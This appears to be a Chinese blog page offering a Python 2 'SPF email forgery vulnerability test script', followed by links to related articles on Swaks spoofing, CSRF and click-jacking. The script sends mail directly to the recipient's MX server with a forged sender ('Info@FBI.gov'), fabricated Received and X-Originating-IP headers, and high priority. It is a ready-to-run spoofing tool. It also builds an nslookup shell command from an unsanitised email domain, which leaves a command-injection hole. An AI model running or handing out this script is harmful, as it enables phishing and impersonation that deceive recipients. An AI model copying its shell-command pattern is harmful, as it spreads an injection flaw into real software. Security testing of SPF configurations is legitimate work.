测试脚本:

# -*- coding: utf-8 -*-

import socket,select,base64,os,re,time,datetime

class mail:

    def __init__(self):

        self.errmsg = ''

    def send(self, buf):

        try:

            byteswritten = 0

            while byteswritten < len(buf):

                byteswritten += self.__sockfd.send(buf[byteswritten:])

        except:

            pass

    def recvline(self, strline):

        detect_fds = [self.__sockfd,]

        rrdy, wrdy, erdy = select.select(detect_fds, [], [], 20)

        if len(rrdy) == 0:

            return False

        else:

            while True:

                try:

                    strtmp = self.__sockfd.recv(1)

                    strline[0] += strtmp[0]

                    if(strtmp[0] == '\n'):

                        print 'server : '+strline[0]

                        break

                except:

                    return False

            return True

    def getresp(self, resp_str):

        while True:

            if(self.recvline(resp_str) == False):

                return False

            else:

                if resp_str[0][3] != '-':

                    break;

        return True

    def mailhelo(self, hostname):

        self.send('helo %s\r\n'%hostname)

        print 'host say: helo %s'%hostname

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailfrom(self, fromstr):

        self.send('mail from: <%s>\r\n'%fromstr)

        print 'host say: mail from: <%s>'%fromstr

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailto(self, tostr):

        self.send('rcpt to: <%s>\r\n'%tostr)

        print 'host say: rcpt to: <%s>'%tostr

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def maildata(self):

        self.send('data\r\n')

        print 'host say: data'

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '354':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailbody(self, bodystr):

        print 'host say: '+'.for <'+self.To+'>; '+time.strftime("%a, %d %b %Y %H:%M:%S +0800 (CST)",time.localtime())+'\r\n'

        print 'host say: '+'From: "=?GB2312?B?zfU=?=" <'+self.From+'>\r\n'

        print 'host say: '+'Subject:'+self.Subject+'?=\r\n'

        print 'host say: '+'To: <'+self.To+'>\r\n'

        print 'host say: '+bodystr

        self.send('Received: from ICE (unknown [8.8.8.8])\r\n')

        self.send('.by 8.8.8.8 (Coremail) with SMTP id _bJCALesoEAeAFMU.1\r\n')

        self.send('.for <'+self.To+'>; '+time.strftime("%a, %d %b %Y %H:%M:%S +0800 (CST)",time.localtime())+'\r\n')

        self.send('X-Originating-IP: [8.8.8.8]\r\n')

        self.send('Date: '+time.strftime("%a, %d %b %Y %H:%M:%S +0800",time.localtime())+'\r\n')

        self.send('From: '+self.FromName+ '<'+self.From+'>\r\n')

        self.send('Subject: '+self.Subject+'\r\n')

        self.send('To: <'+self.To+'>\r\n')

        self.send('X-Priority: 1\r\n')

        self.send('X-mailer: iceMail 1.0 [cn]\r\n')

        self.send('Mime-Version: 1.0\r\n')

        self.send('Content-Type: text/plain;\r\n')

        self.send('.charset="GB2312"\r\n')

        self.send('Content-Transfer-Encoding: quoted-printable\r\n\r\n')

        self.send(bodystr)

        self.send('\r\n.\r\n')

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailquit(self):

        self.send('quit\r\n')

        print 'host say: quit'

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '221':

            print 'server : Bye'

            print 'mail send ok'

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def txmail(self, hostname, mailfrom, rcptto, bodystr):

        mx_server_list = []

        mail_postfix = re.split('@',rcptto)

        #print mail_postfix

        try:

            outstr = os.popen('nslookup -type=mx -timeout=10 %s'%mail_postfix[1], 'r').read()

        except Exception, e:

            print 'DEBUG: Execute nslookup:',e

            return False

        linestr = re.split('\n', outstr)

        for s in linestr:

            if re.match('.+[ |\t]mail exchanger[ |\t].+', s) != None:

                c = re.split(' |\t', s)

                mx_server_list.append(c[len(c) - 1])

        if len(mx_server_list) == 0:

            self.errmsg = 'Can not find MX server'

            return False

        for mx_element in mx_server_list:

            return_val = True

            mx_server_ip = socket.gethostbyname(mx_element)

            tx_sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)

            try:

                tx_sockfd.connect((mx_server_ip, 25))

                self.__sockfd = tx_sockfd

                resp_str = ['',]

                self.getresp(resp_str)

                if self.mailhelo(hostname) and self.mailfrom(mailfrom) \

                     and self.mailto(rcptto) and self.maildata() and self.mailbody(bodystr) and self.mailquit():

                    pass

                else:

                    return_val = False

            except Exception, e:

                return_val = False

            try:

                tx_sockfd.close()

            except:

                pass

            if return_val == True:

                break

        return return_val

    def sendMail(self):

        self.StmpHost=self.From.split("@")[1]

        self.txmail(self.StmpHost, self.From, self.To, self.Data)

if __name__ == '__main__':

    icemail=mail()

    icemail.Port=25

    icemail.To='YourEmail@163.com'

    icemail.From='Info@FBI.gov'

    icemail.FromName='邮件伪造漏洞测试'

    icemail.Subject='邮件伪造漏洞测试'

    icemail.Data='邮件伪造漏洞测试'

    icemail.sendMail()

SPF邮件伪造漏洞测试脚本的更多相关文章

  1. Swaks绕过SPF验证进行邮件伪造

    0x00 swaks简介 Swaks是一个功能强大,灵活,可编写脚本,面向事务的SMTP测试工具,由John Jetmore编写和维护. 目前Swaks托管在私有svn存储库中.官方项目页面是http ...

  2. 邮件伪造测试-Swaks

    1. 前言 在kali中自带一个邮件伪造工具Swaks,工具项目主页为 http://jetmore.org/john/code/swaks 2.基本用法: swaks --to --from --e ...

  3. SPF难以解决邮件伪造的现状以及方案

    邮件伪造的现状 仿冒域名 私搭邮服仿冒域名: 例如某公司企业的域名是example.com,那么攻击者可以搭建一个邮服,也把自己的域名配置为example.com,然后发邮件给真实的企业员工xxx@e ...

  4. 编写自己的Acunetix WVS漏洞扫描脚本详细教程

    AWVS提供了自定义的脚本编程接口,可是网上的资料很少,只有官方的几篇介绍和参考手册,最近研究了一下怎么编写AWVS的漏洞脚本来写一篇简单性的文章 本文以8.0为例,首先呢安装好Acunetix We ...

  5. WordPress HMS Testimonials 多个跨站脚本漏洞和跨站请求伪造漏洞

    漏洞名称: WordPress HMS Testimonials 多个跨站脚本漏洞和跨站请求伪造漏洞 CNNVD编号: CNNVD-201308-199 发布时间: 2013-08-22 更新时间: ...

  6. WordPress A Forms插件HTML注入漏洞和跨站请求伪造漏洞

    漏洞名称: WordPress A Forms插件HTML注入漏洞和跨站请求伪造漏洞 CNNVD编号: CNNVD-201308-281 发布时间: 2013-08-20 更新时间: 2013-08- ...

  7. 点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

    前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配 ...

  8. CSRF 漏洞测试

    CSRF简介: CSRF中文名:跨站请求伪造,英文译为:Cross-site request forgery,CSRF攻击就是attacker(攻击者)利用victim(受害者)尚未失效的身份认证信息 ...

  9. JMeter http(s)测试脚本录制器的使用

    JMeter http(s)测试脚本录制器的使用 by:授客 QQ:1033553122 http(s) Test Script Recorder允许Jmeter在你使用普通浏览器浏览web应用时,拦 ...

随机推荐

  1. LINQ系列:Linq to Object集合操作符

    集合操作符对元素的集合或序列集合进行操作,并返回一个集合.LINQ共有4种集合查询操作符:Distinct.Union.Intersect和Except. 1. Distinct Distinct操作 ...

  2. OpenCASCADE Conic to BSpline Curves-Parabola

    OpenCASCADE Conic to BSpline Curves-Parabola eryar@163.com Abstract. Rational Bezier Curve can repre ...

  3. NFS Volume Provider(Part I) - 每天5分钟玩转 OpenStack(62)

    cinder-volume 支持多种 volume provider,前面我们一直使用的是默认的 LVM,本节我们将增加 NFS volume provider. 虽然 NFS 更多地应用在实验或小规 ...

  4. 借助node实战WebSocket

    一.WebSocket概述 WebSocket协议,是建立在TCP协议上的,而非HTTP协议. 如下: ws://127.0.0.1或wss://127.0.0.1就是WebSocket请求. 注:w ...

  5. Java学习笔记——回调函数

    转载:http://wangyang0311.iteye.com/blog/368031 一般来说分为以下几步: 声明回调函数的统一接口interface A,包含方法callback(); 在调用类 ...

  6. JDBC常用API小结

    建立数据库链接的三种方式: package com.victor_01; import java.sql.Connection; import java.sql.Driver; import java ...

  7. MSIL Hello World

    最近由于需要,开始阅读 MSIL 方面的东西.我读的是<.NET 探秘——MSIL 权威指南>(<Expert .NET 2.0 IL Assembler>中译版).感觉没什么 ...

  8. WebSocket 学习(三)--用nodejs搭建服务器

    前面已经学习了WebSocket API,包括事件.方法和属性.详情:WebSocket(二)--API  WebSocket是基于事件驱动,支持全双工通信.下面通过三个简单例子体验一下. 简单开始 ...

  9. 在本地测试一次成功的AJAX请求

    要在本地测试AJAX,首先是环境的搭建,下面以wamp为例. 1.先在wamp的官网下载wamp的安装包,网址 http://www.wampserver.com/. 2.安装wamp.如果安装过程中 ...

  10. 安装好centOS5.5 后中文乱码

    1.网页浏览的中文乱码 [root@localhost ~]# yum install fonts-chinese 下载完毕后,浏览器可以浏览中文网页. 2.应用显示中文乱码 #vi /etc/sys ...